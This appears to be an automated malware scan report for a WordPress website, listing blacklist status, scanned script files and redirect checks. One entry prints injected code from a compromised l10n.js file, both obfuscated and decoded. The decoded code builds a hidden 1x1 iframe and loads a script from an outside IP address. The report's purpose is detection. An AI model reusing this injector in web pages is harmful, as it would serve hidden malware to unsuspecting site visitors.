Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=melliotgreene.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://melliotgreene.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.melliotgreene.com/ | 200 OK Content-Length: 10726 Content-Type: text/html | clean |
http://www.melliotgreene.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 5976 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0x473c=["\x6E\x20\x71\x28\x29\x7B\x33\x3D\x30\x2E\x62\x28\x27\x64\x27\x29\x3B\x33\x2E\x63\x3D\x27\x70\x3A\x2F\x2F\x6A\x2E\x4 ...[5549 bytes skipped]... Decoded script: function Make(){element=document.getElementById('gogle_api');element.src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js';element=document.getElementById('iframe');element.src=assa}function MakeFrame(){element=document.getElementById('gogle_api');if(!element){var el2=document.createElement("iframe");document.body.appendChild(el2);el2.id='iframe';el2.style.width='1px';el2.style.height='1px';var el=document.createElement("script");document.body.appendChild(el);el.id='gogle_api';el.src='http://91.196.216.20/url.php';var t=setTimeout("Make()",1000)}}var ua=navigator.userAgent.toLowerCase();if(((ua.indexOf ...[1719 bytes skipped]... | ||
http://www.melliotgreene.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 84285 Content-Type: application/javascript | clean |
http://www.melliotgreene.com/wp-content/themes/Modest/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.6 | 200 OK Content-Length: 10622 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.et_shortcodes_switcher = function(options) { var defaults = { slides: '>div', activeClass: 'active', linksNav: '', findParent: true, lengthElement: 'li', useArrows: false, arrowLeft: 'a#prev-arrow', arrowRight: 'a#next-arrow', auto: false, autoSpeed: 5000, slidePadding: '', pauseOnHover: true, fx: 'fade', sliderT Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/js/jquery.easing.1.3.js | 200 OK Content-Length: 10302 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/js/superfish.js | 200 OK Content-Length: 5919 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/js/custom.js | 200 OK Content-Length: 7950 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); jQuery('ul.nav').superfish({ delay: 200, animation: {opacity:'show',height:'show'}, speed: 'fast', autoArrows: true, dropShadows: false }); jQuery('ul.nav > li > a.sf-with-ul').parent('li').addClass('sf-ul'); var $featured_slider = jQuery('#featured'), $featured_slides = $featured_slider.find('.slide'), Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 24802 Content-Type: application/javascript | clean |
http://www.melliotgreene.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.4 | 200 OK Content-Length: 8007 Content-Type: application/javascript | clean |
http://www.melliotgreene.com/wp-content/themes/Modest/epanel/page_templates/js/fancybox/jquery.fancybox-1.2.6.pack.js?ver=1.3.2 | 200 OK Content-Length: 11727 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\' Antivirus reports:
| ||
http://www.melliotgreene.com/wp-content/themes/Modest/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 5932 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { jQuery("a[class^='fancybox']").fancybox({ 'overlayOpacity' : 0.7, 'overlayColor' : '#000000', 'zoomSpeedIn' : 500, 'zoomSpeedOut' : 500 }); var $portfolioItem = jQuery('.et_pt_gallery_entry'); $portfolioItem.find('.et_pt_item_image').css('background-color','#000000'); jQuery('.zoom-icon, .more-icon').css({'opacity':'0','visibility':'visible'}); $portfolioItem.hover(function(){ jQuery( Antivirus reports:
| ||
http://www.melliotgreene.com/?page_id=5 | 200 OK Content-Length: 11786 Content-Type: text/html | clean |
http://www.melliotgreene.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2991 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form Antivirus reports:
| ||
http://www.melliotgreene.com/?page_id=7 | 200 OK Content-Length: 10495 Content-Type: text/html | clean |
http://www.melliotgreene.com/?page_id=9 | 200 OK Content-Length: 12700 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: melliotgreene.com
Result:
GET / HTTP/1.1
Host: melliotgreene.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: melliotgreene.com
Referer: http://www.google.com/search?q=melliotgreene.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: melliotgreene.com
Referer: http://www.google.com/search?q=melliotgreene.com
Result:
The result is similar to the first query. There are no suspicious redirects found.